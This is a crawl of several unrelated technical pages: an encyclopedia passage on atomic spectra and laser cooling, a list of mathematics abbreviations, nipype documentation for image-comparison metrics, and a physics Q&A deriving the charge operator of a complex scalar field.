very large orbits. In this limit, the frequency, intensity, and polarization can be accurately calculated by applying the classical laws of electrodynamics to the radiation from the orbiting electron. This fact illustrates Bohr's correspondence principle, according to which the quantum results must agree with the classical ones for large dimensions. The deviation from classical theory that occurs when the orbits are smaller than the limiting case is such that one may no longer picture an accurately defined orbit. Bohr's other hypotheses are still valid.\n\nAccording to Bohr's theory, the energies of the hydrogen atom are quantized (that is, can take on only certain discrete values). These energies can be calculated from the electron orbits permitted by the quantized orbital angular momentum. The orbit may be circular or elliptical, so only the circular orbit is considered here for simplicity. Let the electron, of mass m and electric charge -e, describe a circular orbit of radius r around a nucleus of charge +e and of infinite mass. With the electron velocity v, the angular momentum is mvr, and the second postulate becomes Eq. (1).\n\n(1)", null, "The integer n is called the principal quantum number. The possible energies of the nonradiating states of the atom are given by Eq. (2).\n(2)", null, "Here 0 is the permittivity of free space, a constant included in order to give the correct units to the statement of Coulomb's law in SI units.\n\nThe same equation for the hydrogen atom's energy levels, except for some small but significant corrections, is obtained from the solution of the Schrödinger equation, as modified by W. Pauli, for the hydrogen atom. See Quantum numbers\n\nThe frequencies of electromagnetic radiation or light emitted or absorbed in transitions are given by Eq. (3),\n\n(3)", null, "where E and E are the energies of the initial and final states of the atom. Spectroscopists usually express their measurements in wavelength λ or in wave number &sgr; in order to obtain numbers of a convenient size. The wave number of a transition is shown in Eq. (4). (4)", null, "If T = E(hc), then Eq. (5) results. Here T is called the spectral term. (5)", null, "The allowed terms for hydrogen, from Eq. (2), are given by Eq. (6).\n\n(6)", null, "The quantity R is the important Rydberg constant. Its value, which has been measured to a remarkable and rapidly improving accuracy, is related to the values of other well-known atomic constants, as in Eq. (6). See Rydberg constant\n\nThe effect of finite nuclear mass must be considered, since the nucleus does not actually remain at rest at the center of the atom. Instead, the electron and nucleus revolve about their common center of mass. This effect can be accurately accounted for and requires a small change in the value of the effective mass m in Eq. (6).\n\nIn addition to the circular orbits already described, elliptical ones are also consistent with the requirement that the angular momentum be quantized. A. Sommerfeld showed that for each value of n there is a family of n permitted elliptical orbits, all having the same major axis but with different eccentricities. Illustration a shows, for example, the Bohr-Sommerfeld orbits for n = 3. The orbits are labeled s, p, and d, indicating values of the azimuthal quantum number l = 0, 1, and 2. This number determines the shape of the orbit, since the ratio of the major to the minor axis is found to be n(l = 1). To a first approximation, the energies of all orbits of the same n are equal. In the case of the highly eccentric orbits, however, there is a slight lowering of the energy due to precession of the orbit (illus. b). According to Einstein's theory of relativity, the mass increases somewhat in the inner part of the orbit, because of greater velocity. The velocity increase is greater as the eccentricity is greater, so the orbits of higher eccentricity have their energies lowered more. The quantity l is called the orbital angular momentum quantum number or the azimuthal quantum number. See Relativity\n\n#### Multielectron atoms\n\nIn attempting to extend Bohr's model to atoms with more than one electron, it is logical to compare the experimentally observed terms of the alkali atoms, which contain only a single electron outside closed shells, with those of hydrogen. A definite similarity is found but with the striking difference that all terms with l > 0 are double. This fact was interpreted by S. A. Goudsmit and G. E. Uhlenbeck as due to the presence of an additional angular momentum of (h2&pgr;) attributed to the electron spinning about its axis. The spin quantum number of the electron is s = .\n\nThe relativistic quantum mechanics developed by P. A. M. Dirac provided the theoretical basis for this experimental observation. See Electron spin\n\nImplicit in much of the following discussion is W. Pauli's exclusion principle, first enunciated in 1925, which when applied to atoms may be stated as follows: no more than one electron in a multielectron atom can possess precisely the same quantum numbers. In an independent, hydrogenic electron approximation to multielectron atoms, there are 2n2 possible independent choices of the principal (n), orbital (l), and magnetic (ml, ms) quantum numbers available for electrons belonging to a given n, and no more. Here ml and ms refer to the quantized projections of l and s along some chosen direction. The organization of atomic electrons into shells of increasing radius (the Bohr radius scales as n2) follows from this principle. See Exclusion principle\n\nThe energy of interaction of the electron's spin with its orbital angular momentum is known as spin-orbit coupling. A charge in motion through either “pure” electric or “pure” magnetic fields, that is, through fields perceived as “pure” in a static laboratory, actually experiences a combination of electric and magnetic fields, if viewed in the frame of reference of a moving observer with respect to whom the charge is momentarily at rest. For example, moving charges are well known to be deflected by magnetic fields. But in the rest frame of such a charge, there is no motion, and any acceleration of a charge must be due to the presence of a pure electric field from the point of view of an observer analyzing the motion in that reference frame. See Relativistic electrodynamics\n\nA spinning electron can crudely be pictured as a spinning ball of charge, imitating a circulating electric current. This circulating current gives rise to a magnetic field distribution very similar to that of a small bar magnet, with north and south magnetic poles symmetrically distributed along the spin axis above and below the spin equator. This representative bar magnet can interact with external magnetic fields, one source of which is the magnetic field experienced by an electron in its rest frame, owing to its orbital motion through the electric field established by the central nucleus of an atom. In multielectron atoms, there can be additional, though generally weaker, interactions arising from the magnetic interactions of each electron with its neighbors, as all are moving with respect to each other and all have spin. The strength of the bar magnet equivalent to each electron spin, and its direction in space are characterized by a quantity called the magnetic moment, which also is quantized essentially because the spin itself is quantized. Studies of the effect of an external magnetic field on the states of atoms show that the magnetic moment associated with the electron spin is equal in magnitude to a unit called the Bohr magneton.\n\nThe energy of the interaction between the electron's magnetic moment and the magnetic field generated by its orbital motion is usually a small correction to the spectral term, and depends on the angle between the magnetic moment and the magnetic field or, equivalently, between the spin angular momentum vector and the orbital angular momentum vector (a vector perpendicular to the orbital plane whose magnitude is the size of the orbital angular momentum). Since quantum theory requires that the quantum number j of the electron's total angular momentum shall take values differing by integers, while l is always an integer, there are only two possible orientations for s relative to l: s must be either parallel or antiparallel to l.\n\nFor the case of a single electron outside the nucleus, the Dirac theory gives Eq. (7)\n\n(7)", null, "for the spin-orbit correction to the spectral terms. Here α = e2/(2ε0hc) ≅ 1/137 is called the fine structure constant.\n\nIn atoms having more than one electron, this fine structure becomes what is called the multiplet structure. The doublets in the alkali spectra, for example, are due to spin-orbit coupling; Eq. (7), with suitable modifications, can still be applied.\n\nWhen more than one electron is present in the atom, there are various ways in which the spins and orbital angular momenta can interact. Each spin may couple to its own orbit, as in the one-electron case; other possibilities are orbit-other orbit, spin-spin, and so on. The most common interaction in the light atoms, called LS coupling or Russell-Saunders coupling, is described schematically in Eq. (8).\n\n(8)", null, "This notation indicates that the l are coupled strongly together to form a resultant L, representing the total orbital angular momentum. The si are coupled strongly together to form a resultant S, the total spin angular momentum. The weakest coupling is that between L and S to form J, the total angular momentum of the electron system of the atom in this state.\n\nCoupling of the LS type is generally applicable to the low-energy states of the lighter atoms. The next commonest type is called jj coupling, represented in Eq. (9).\n\n(9)", null, "Each electron has its spin coupled to its own orbital angular momentum to form a ji for that electron. The various ji are then more weakly coupled together to give J. This type of coupling is seldom strictly observed. In the heavier atoms it is common to find a condition intermediate between LS and jj coupling; then either the LS or jj notation may be used to describe the levels, because the number of levels for a given electron configuration is independent of the coupling scheme.\n\n#### Nuclear magnetism and hyperfine structure\n\nMost atomic nuclei also possess spin, but rotate about 2000 times slower than electrons because their mass is on the order of 2000 or more times greater than that of electrons. Because of this, very weak nuclear magnetic fields, analogous to the electronic ones that produce fine structure in spectral lines, further split atomic energy levels. Consequently, spectral lines arising from them are split according to the relative orientations, and hence energies of interaction, of the nuclear magnetic moments with the electronic ones. The resulting pattern of energy levels and corresponding spectral-line components is referred to as hyperfine structure. See Nuclear moments\n\nNuclear properties also affect atomic spectra through the isotope shift. This is the result of the difference in nuclear masses of two isotopes, which results in a slight change in the Rydberg constant. There is also sometimes a distortion of the nucleus, which can be detected by ultrahigh precision spectroscopy. See Molecular beams, Particle trap\n\nIn most cases, a common problem called Doppler broadening of the spectral lines arises, which can cause overlapping of spectral lines and make analysis difficult. The broadening arises from motion of the emitted atom with respect to a spectrometer. Several ingenious ways of isolating only those atoms nearly at rest with respect to spectrometric apparatus have been devised. The most powerful employ lasers and either involve saturation spectroscopy, utilizing a saturating beam and probe beam from the same tunable laser, or use two laser photons which jointly drive a single atomic transition and are generated in lasers so arranged that the first-order Doppler shifts of the photons cancel each other. See Doppler effect\n\nIt would be misleading to think that the most probable fate of excited atomic electrons consists of transitions to lower orbits, accompanied by photon emission. In fact, for at least the first third of the periodic table, the preferred decay mode of most excited atomic systems in most states of excitation and ionization is the electron emission process first observed by P. Auger in 1925 and named after him. For example, a singly charged neon ion lacking a 1s electron is more than 50 times as likely to decay by electron emission as by photon emission. In the process, an outer atomic electron descends to fill an inner vacancy, while another is ejected from the atom to conserve both total energy and momentum in the atom. The ejection usually arises because of the interelectron Coulomb repulsion. See Auger effect\n\n#### Cooling and stopping atoms and ions\n\nDespite impressive progress in reducing Doppler shifts and Doppler spreads, these quantities remain factors that limit the highest obtainable spectroscopic resolutions. The 1980s and 1990s saw extremely rapid development of techniques for trapping neutral atoms and singly charged ions in a confined region of space, and then cooling them to much lower temperatures by the application of laser-light cooling techniques. Photons carry not only energy but also momentum; hence they can exert pressure on neutral atoms as well as charged ions. See Laser cooling\n\nSchemes have been developed to exploit these light forces to confine neutral atoms in the absence of material walls, whereas various types of so-called bottle configurations of electromagnetic fields developed earlier remain the technique of choice for similarly confining ions. Various ingenious methods have been invented to slow down and even nearly stop neutral atoms and singly charged ions, whose energy levels (unlike those of most more highly charged ions) are accessible to tunable dye lasers. These methods often utilize the velocity-dependent light pressure from laser photons of nearly the same frequency as, but slightly less energetic than, the energy separation of two atomic energy levels to induce a transition between these levels.\n\nThe magnetooptic trap combines optical forces provided by laser light with a weak magnetic field whose size goes through zero at the geometrical center of the trap and increases with distance from this center. The net result is a restoring force which confines sufficiently laser-cooled atoms near the center. Ingenious improvements have allowed cooling of ions to temperatures as low as 180 × 10-9 K.\n\nFor more highly ionized ions, annular storage rings are used in which radial confinement of fast ion beams (with speeds of approximately 10% or more of the speed of light) is provided by magnetic focusing. Two cooling schemes are known to work on stored beams of charged particles, the so-called stochastic cooling method and the electron cooling method. In the former, deviations from mean stored particle energies are electronically detected, and electronic “kicks” that have been adjusted in time and direction are delivered to the stored particles to compensate these deviations. In electron cooling, which proves to be more effective for stored heavy ions of high charge, electron beams prepared with a narrow velocity distribution are merged with the stored ion beams. When the average speeds of the electrons and the ions are matched, the Coulomb interaction between the relatively cold (low-velocity-spread) electrons and the highly charged ions efficiently transfers energy from the warmer ions, thereby reducing the temperature of the stored ions.\n\nMcGraw-Hill Concise Encyclopedia of Physics. © 2002 by The McGraw-Hill Companies, Inc.\nSite: Follow: Share:\nOpen / Close" ]
[ null, "https://img.tfd.com/mgh/cep/math/060900MF0010.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0040.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0050.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0060.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0070.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0080.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0090.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0100.gif", null, "https://img.tfd.com/mgh/cep/math/060900MF0110.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9313173,"math_prob":0.9569007,"size":18494,"snap":"2021-04-2021-17","text_gpt3_token_len":3589,"char_repetition_ratio":0.1443483,"word_repetition_ratio":0.004095563,"special_character_ratio":0.18492484,"punctuation_ratio":0.089115016,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9660977,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-24T05:21:46Z\",\"WARC-Record-ID\":\"<urn:uuid:3ac6cff1-3d4d-4b83-a3fc-e5221525137f>\",\"Content-Length\":\"62599\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:56fb4a41-7877-4af3-9943-ed6b1702e4e8>\",\"WARC-Concurrent-To\":\"<urn:uuid:791eceef-575f-44a3-b288-d4d62378e3b9>\",\"WARC-IP-Address\":\"85.195.124.227\",\"WARC-Target-URI\":\"https://encyclopedia2.thefreedictionary.com/Atomic+structure+and+spectra\",\"WARC-Payload-Digest\":\"sha1:OIHT6RCCSORR6TBJS32GAF2J5Q2CGCCB\",\"WARC-Block-Digest\":\"sha1:UGPRW65L2WHO6ZOGARM3CBIDCTVFSGXW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703547333.68_warc_CC-MAIN-20210124044618-20210124074618-00017.warc.gz\"}"}
https://www.onlineabbreviations.com/acronyms/math
[ "# Mathematics Abbreviations\n\n#### Browse all acronyms and abbreviations related to the Mathematics terminology and jargon.\n\nyou just see All 3368 abbreviations related by the acronyms or terminology and jargon is Mathematics under the category Academic & Science\n\n3368 Abbreviations & Definitions of Acronyms Mathematics in category Academic & Science\n\nBrowse All Abbreviation related to the Acronym Mathematics. All abbreviations on this page are ! means Factorial, \" means Second derivative, # means Number, % means Per Cent, ( ] means Half Open Set on the Left, () means Open Set, * means Multiplication, - means Subtraction, - means Negative, -1' means Minus One Dash, / means Division, 00110 means The binary representation for the number 6, 121 means One-to-One correspondence, 1E1 means An Hexadecimal number equals to 481 in Decimal, 1E6 means 1,000,000, 1E9 means The shorthand form for the number 1,000,000,000 (a billion) in mathematics. It is more commonly written as 10^9., 1NF means First Normal Form, 250K means Two Hundred Fifty Thousand, 2D means Two Dimensional, 2DFT means Two-Dimensional Fourier Transform,\n\nAbbreviationsDefinitionMore\n!Factorial. !\n\"Second derivative. \"\n#Number. #\n%Per Cent. %\n( ]Half Open Set on the Left. ( ]\n()Open Set. ()\n*Multiplication. *\n-Subtraction. -\n-Negative. -\n-1'Minus One Dash. -1'\n/Division. /\n00110The binary representation for the number 6. 00110\n121One-to-One correspondence. 121\n1E1An Hexadecimal number equals to 481 in Decimal. 1E1\n1E61,000,000. 1E6\n1E9The shorthand form for the number 1,000,000,000 (a billion) in mathematics. It is more commonly written as 10^9.. 1E9\n1NFFirst Normal Form. 1NF\n250KTwo Hundred Fifty Thousand. 250K\n2DTwo Dimensional. 2D\n2DFTTwo-Dimensional Fourier Transform. 2DFT\n\n### New\n\n#### Latest abbreviations\n\n»\n(FA)SL\n(F*** A) Silver Lining\nALLG\nAustralasian Leukemia and Lymphoma Group\nAMPS\nAmmunition Management Policy Statements\nANT\nAminoglycosides Nucleotidyl Transferases\nANY\nAll Nigerian Youth" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.77737606,"math_prob":0.85751206,"size":1778,"snap":"2019-51-2020-05","text_gpt3_token_len":516,"char_repetition_ratio":0.13585119,"word_repetition_ratio":0.13818182,"special_character_ratio":0.3200225,"punctuation_ratio":0.184375,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95516926,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-28T21:03:24Z\",\"WARC-Record-ID\":\"<urn:uuid:5cf0bf2e-1483-4014-9a54-5b83e118e6af>\",\"Content-Length\":\"20735\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ac79696f-375b-4ba0-b6b2-b29e5ff20d42>\",\"WARC-Concurrent-To\":\"<urn:uuid:f7a69f2e-524c-4acc-9fe8-e5db4d066635>\",\"WARC-IP-Address\":\"104.18.56.18\",\"WARC-Target-URI\":\"https://www.onlineabbreviations.com/acronyms/math\",\"WARC-Payload-Digest\":\"sha1:O6VD3B35PJ5ZIC23BYBKPOM5SCWSPKMX\",\"WARC-Block-Digest\":\"sha1:GFAAK3WA4DLDZJIQTQQA4O2VUS5ZSIBD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251783000.84_warc_CC-MAIN-20200128184745-20200128214745-00502.warc.gz\"}"}
https://nipype.readthedocs.io/en/latest/interfaces/generated/nipype.algorithms.metrics.html
[ "# algorithms.metrics¶\n\n## Distance¶\n\nCalculates distance between two volumes.\n\nInputs:\n\n```[Mandatory]\nvolume1: (a pathlike object or string representing an existing file)\nHas to have the same dimensions as volume2.\nvolume2: (a pathlike object or string representing an existing file)\nHas to have the same dimensions as volume1.\n\n[Optional]\nmethod: ('eucl_min' or 'eucl_cog' or 'eucl_mean' or 'eucl_wmean' or\n'eucl_max', nipype default value: eucl_min)\n\"\"eucl_min\": Euclidean distance between two closest points\n\"eucl_cog\": mean Euclidian distance between the Center of Gravity of\nvolume1 and CoGs of volume2 \"eucl_mean\": mean Euclidian minimum\ndistance of all volume2 voxels to volume1 \"eucl_wmean\": mean\nEuclidian minimum distance of all volume2 voxels to volume1 weighted\nby their values \"eucl_max\": maximum over minimum Euclidian distances\nof all volume2 voxels to volume1 (also known as the Hausdorff\ndistance)\nmask_volume: (a pathlike object or string representing an existing\nfile)\ncalculate overlap only within this mask.\n```\n\nOutputs:\n\n```distance: (a float)\npoint1: (an array with shape (3,))\npoint2: (an array with shape (3,))\nhistogram: (a pathlike object or string representing a file)\n```\n\n## ErrorMap¶\n\nCalculates the error (distance) map between two input volumes.\n\n### Example¶\n\n```>>> errormap = ErrorMap()\n>>> errormap.inputs.in_ref = 'cont1.nii'\n>>> errormap.inputs.in_tst = 'cont2.nii'\n>>> res = errormap.run() # doctest: +SKIP\n```\n\nInputs:\n\n```[Mandatory]\nin_ref: (a pathlike object or string representing an existing file)\nReference image. Requires the same dimensions as in_tst.\nin_tst: (a pathlike object or string representing an existing file)\nTest image. Requires the same dimensions as in_ref.\nmetric: ('sqeuclidean' or 'euclidean', nipype default value:\nsqeuclidean)\nerror map metric (as implemented in scipy cdist)\n\n[Optional]\nmask: (a pathlike object or string representing an existing file)\ncalculate overlap only within this mask.\nout_map: (a pathlike object or string representing a file)\nName for the output file\n```\n\nOutputs:\n\n```out_map: (a pathlike object or string representing an existing file)\nresulting error map\ndistance: (a float)\nAverage distance between volume 1 and 2\n```\n\n## FuzzyOverlap¶\n\nCalculates various overlap measures between two maps, using the fuzzy definition proposed in: Crum et al., Generalized Overlap Measures for Evaluation and Validation in Medical Image Analysis, IEEE Trans. Med. Ima. 25(11),pp 1451-1461, Nov. 2006.\n\nin_ref and in_tst are lists of 2/3D images, each element on the list containing one volume fraction map of a class in a fuzzy partition of the domain.\n\n### Example¶\n\n```>>> overlap = FuzzyOverlap()\n>>> overlap.inputs.in_ref = [ 'ref_class0.nii', 'ref_class1.nii' ]\n>>> overlap.inputs.in_tst = [ 'tst_class0.nii', 'tst_class1.nii' ]\n>>> overlap.inputs.weighting = 'volume'\n>>> res = overlap.run() # doctest: +SKIP\n```\n\nInputs:\n\n```[Mandatory]\nin_ref: (a list of items which are a pathlike object or string\nrepresenting an existing file)\nReference image. Requires the same dimensions as in_tst.\nin_tst: (a list of items which are a pathlike object or string\nrepresenting an existing file)\nTest image. Requires the same dimensions as in_ref.\n\n[Optional]\nin_mask: (a pathlike object or string representing an existing file)\nweighting: ('none' or 'volume' or 'squared_vol', nipype default\nvalue: none)\n'none': no class-overlap weighting is performed. 'volume': computed\nclass-overlaps are weighted by class volume 'squared_vol': computed\nclass-overlaps are weighted by the squared volume of the class\nout_file: (a pathlike object or string representing a file, nipype\ndefault value: diff.nii)\nalternative name for resulting difference-map\n```\n\nOutputs:\n\n```jaccard: (a float)\nFuzzy Jaccard Index (fJI), all the classes\ndice: (a float)\nFuzzy Dice Index (fDI), all the classes\nclass_fji: (a list of items which are a float)\nArray containing the fJIs of each computed class\nclass_fdi: (a list of items which are a float)\nArray containing the fDIs of each computed class\n```\n\n## Overlap¶\n\nCalculates Dice and Jaccard’s overlap measures between two ROI maps. The interface is backwards compatible with the former version in which only binary files were accepted.\n\nThe averaged values of overlap indices can be weighted. Volumes now can be reported in", null, ", although they are given in voxels to keep backwards compatibility.\n\n### Example¶\n\n```>>> overlap = Overlap()\n>>> overlap.inputs.volume1 = 'cont1.nii'\n>>> overlap.inputs.volume2 = 'cont2.nii'\n>>> res = overlap.run() # doctest: +SKIP\n```\n\nInputs:\n\n```[Mandatory]\nvolume1: (a pathlike object or string representing an existing file)\nHas to have the same dimensions as volume2.\nvolume2: (a pathlike object or string representing an existing file)\nHas to have the same dimensions as volume1.\nbg_overlap: (a boolean, nipype default value: False)\nconsider zeros as a label\nvol_units: ('voxel' or 'mm', nipype default value: voxel)\nunits for volumes\n\n[Optional]\nmask_volume: (a pathlike object or string representing an existing\nfile)\ncalculate overlap only within this mask.\nout_file: (a pathlike object or string representing a file, nipype\ndefault value: diff.nii)\nweighting: ('none' or 'volume' or 'squared_vol', nipype default\nvalue: none)\n'none': no class-overlap weighting is performed. 'volume': computed\nclass-overlaps are weighted by class volume 'squared_vol': computed\nclass-overlaps are weighted by the squared volume of the class\n```\n\nOutputs:\n\n```jaccard: (a float)\naveraged jaccard index\ndice: (a float)\naveraged dice index\nroi_ji: (a list of items which are a float)\nthe Jaccard index (JI) per ROI\nroi_di: (a list of items which are a float)\nthe Dice index (DI) per ROI\nvolume_difference: (a float)\naveraged volume difference\nroi_voldiff: (a list of items which are a float)\nvolume differences of ROIs\nlabels: (a list of items which are an integer (int or long))\ndetected labels\ndiff_file: (a pathlike object or string representing an existing\nfile)\nerror map of differences\n```\n\n## Similarity¶\n\nCalculates similarity between two 3D or 4D volumes. Both volumes have to be in the same coordinate system, same space within that coordinate system and with the same voxel dimensions.\n\nNote\n\nThis interface is an extension of `nipype.interfaces.nipy.utils.Similarity` to support 4D files. Requires `nipy`\n\n### Example¶\n\n```>>> from nipype.algorithms.metrics import Similarity\n>>> similarity = Similarity()\n>>> similarity.inputs.volume1 = 'rc1s1.nii'\n>>> similarity.inputs.volume2 = 'rc1s2.nii'\n>>> similarity.inputs.metric = 'cr'\n>>> res = similarity.run() # doctest: +SKIP\n```\n\nInputs:\n\n```[Mandatory]\nvolume1: (a pathlike object or string representing an existing file)\n3D/4D volume\nvolume2: (a pathlike object or string representing an existing file)\n3D/4D volume\n\n[Optional]\nmask1: (a pathlike object or string representing an existing file)\n3D volume\nmask2: (a pathlike object or string representing an existing file)\n3D volume\nmetric: ('cc' or 'cr' or 'crl1' or 'mi' or 'nmi' or 'slr' or a\ncallable value, nipype default value: None)\nstr or callable\nCost-function for assessing image similarity. If a string,\none of 'cc': correlation coefficient, 'cr': correlation\nratio, 'crl1': L1-norm based correlation ratio, 'mi': mutual\ninformation, 'nmi': normalized mutual information, 'slr':\nsupervised log-likelihood ratio. If a callable, it should\ntake a two-dimensional array representing the image joint\nhistogram as an input and return a float.\n```\n\nOutputs:\n\n```similarity: (a list of items which are a float)\n```" ]
[ null, "https://nipype.readthedocs.io/en/latest/_images/math/33874d361f927647c8c66416f6cc21a3cf1a2e64.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.72073716,"math_prob":0.6424996,"size":7486,"snap":"2019-26-2019-30","text_gpt3_token_len":1885,"char_repetition_ratio":0.17214648,"word_repetition_ratio":0.35740742,"special_character_ratio":0.23657493,"punctuation_ratio":0.15437788,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9739568,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-21T19:04:04Z\",\"WARC-Record-ID\":\"<urn:uuid:bb80a5ca-0b2e-46e1-ae4d-cb719c62c67b>\",\"Content-Length\":\"50767\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c83f7b6-6d74-42d9-a20f-6afd445d3cf5>\",\"WARC-Concurrent-To\":\"<urn:uuid:f17ab454-eaae-46fb-bda7-fc1297731e32>\",\"WARC-IP-Address\":\"137.116.78.48\",\"WARC-Target-URI\":\"https://nipype.readthedocs.io/en/latest/interfaces/generated/nipype.algorithms.metrics.html\",\"WARC-Payload-Digest\":\"sha1:O7FJ3N44ZQP4WLL5A76RAZ7HSLQX2HAF\",\"WARC-Block-Digest\":\"sha1:HKYXMTSXCJSTBN6MBNXBQ4DSSVJLDMSC\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195527196.68_warc_CC-MAIN-20190721185027-20190721211027-00082.warc.gz\"}"}
https://physics.stackexchange.com/questions/218616/how-to-fourier-transform-creation-annihilation-operators
[ "How to Fourier transform creation/annihilation operators?\n\nZee's QFT in a Nutshell pages 65-66. For a complex scalar QFT\n\n$$\\varphi(\\vec{x},t) = \\int\\frac{d^Dk}{\\sqrt{(2\\pi)^D2\\omega_k}}\\left[a(\\vec{k})\\mathrm{e}^{-i(\\omega_kt-\\vec{k}\\cdot\\vec{x})} + b^\\dagger(\\vec{k})\\mathrm{e}^{i(\\omega_kt-\\vec{k}\\cdot\\vec{x})}\\right] \\tag{17}$$\n\nwith creation/annihilation operators $a,a^\\dagger,b,b^\\dagger$ he defines the current $J$ and charge $Q$:\n\n\\begin{align} J_\\mu & = i(\\varphi^\\dagger\\partial_\\mu\\varphi - \\partial_\\mu\\varphi^\\dagger\\varphi)\\tag{18}\\\\ Q & = \\int d^DxJ_0(x). \\end{align}\n\nI want to check that\n\n\\begin{align} \\tag{1} Q = \\int d^Dk[a^\\dagger(\\vec{k})a(\\vec{k}) - b^\\dagger(\\vec{k})b(\\vec{k})] \\end{align}\n\nThat's what I've done so far (there are three integrals, the $dx$ one from the definition of $Q$, the $dk$ and $dl$ ones from the $\\varphi$ and $\\partial_\\mu\\varphi$ in the definition of $J$):\n\n\\begin{align} Q = & \\int d^DxJ_0(x) = i\\int d^Dx(\\varphi^\\dagger\\partial_0 \\varphi - \\varphi\\partial_0\\varphi^\\dagger)\\\\ % = \\,& i\\int d^Dx(\\varphi^\\dagger\\pi - \\varphi\\pi^\\dagger)\\\\ = & i(i\\omega_k)\\iiint d^Dxd^Dkd^Dl\\frac{1}{(\\sqrt{(2\\pi)^D 2\\omega_k})^2}\\bigg[\\\\ & \\left(a^\\dagger(\\vec{k})e^{ikx}+b(\\vec{k})e^{-ikx}\\right) \\left(-a(\\vec{l})e^{-ilx}+b^\\dagger(\\vec{l})e^{ilx}\\right)-\\\\ & \\left(a(\\vec{k})e^{-ikx}+b^\\dagger(\\vec{k})e^{ikx}\\right) \\left(a^\\dagger(\\vec{l})e^{ilx}-b(\\vec{l})e^{-ilx}\\right) \\bigg]\\\\ = & \\iiint d^Dxd^Dkd^Dl\\frac{1}{2(2\\pi)^D}\\bigg[\\\\ & a^\\dagger(\\vec{k})a(\\vec{l})e^{ix(k-l)}+a(\\vec{k})a^\\dagger(\\vec{l})e^{ix(l-k)}-b^\\dagger(\\vec{k})b(\\vec{l})e^{ix(k-l)}-b(\\vec{k})b^\\dagger(\\vec{l})e^{ix(l-k)} +\\\\ & \\left(b^\\dagger(\\vec{k})a^\\dagger(\\vec{l})-a^\\dagger(\\vec{k})b^\\dagger(\\vec{l})\\right)e^{ix(k+l)} + \\left(b(\\vec{k})a(\\vec{l})-a(\\vec{k})b(\\vec{l})\\right)e^{ix(k+l)} \\bigg] \\end{align}\n\nIF I could set $k=l$, then this whole mess would clean up and I get the desired result: The last line should vanish because $[a, b]=[a^\\dagger,b^\\dagger]=0$. In the second-to-last line for $k=l$ we have $a^\\dagger a+aa^\\dagger = 2a^\\dagger a + 1$ because of $[a,a^\\dagger]=1$, and this would imply $(1)$.\n\nBut why can I set $k=l$? Maybe I can use $2\\pi\\delta(y)=\\int dz e^{-iyz}$ somehow to get a $\\delta(k-l)$ in the integral, but I'm too inexperienced in Fourier transforms of operators.\n\n• To be clear - space-time is $(D+1)$-dimensional? – Prahar Nov 15 '15 at 13:31\n• @Prahar yes, space-time is $(D+1)$-dimensional. To simplify the notation of the exponentials, I have used $xk = t\\omega_k - \\vec{x}\\cdot\\vec{k}$ with $\\omega_k=\\sqrt{k^2+m^2}$. – Bass Nov 15 '15 at 13:44\n• Why do you say \"maybe\" for your last attempt? That's exactly what you do - nothing else there depends on $x$, so you can just carry out the integral over it, and that gives you the delta function you need. – ACuriousMind Nov 15 '15 at 13:47\n• @ACuriousMind Arrrgh! Of course, I can just do the $dx$ integral first, then there are no operators in the integral! I desperately wanted to get rid of the $dl$ integral so I didn't care about the $dx$ one. ::sigh:: Thanks a lot! – Bass Nov 15 '15 at 13:56\n• @ACuriousMind what about the last line? There, I get a $\\delta(k+l)$, so $l=-k$. If the c/a operators were symmetric in their argument, then the last line would vanish. – Bass Nov 15 '15 at 14:08" ]
[ null ]
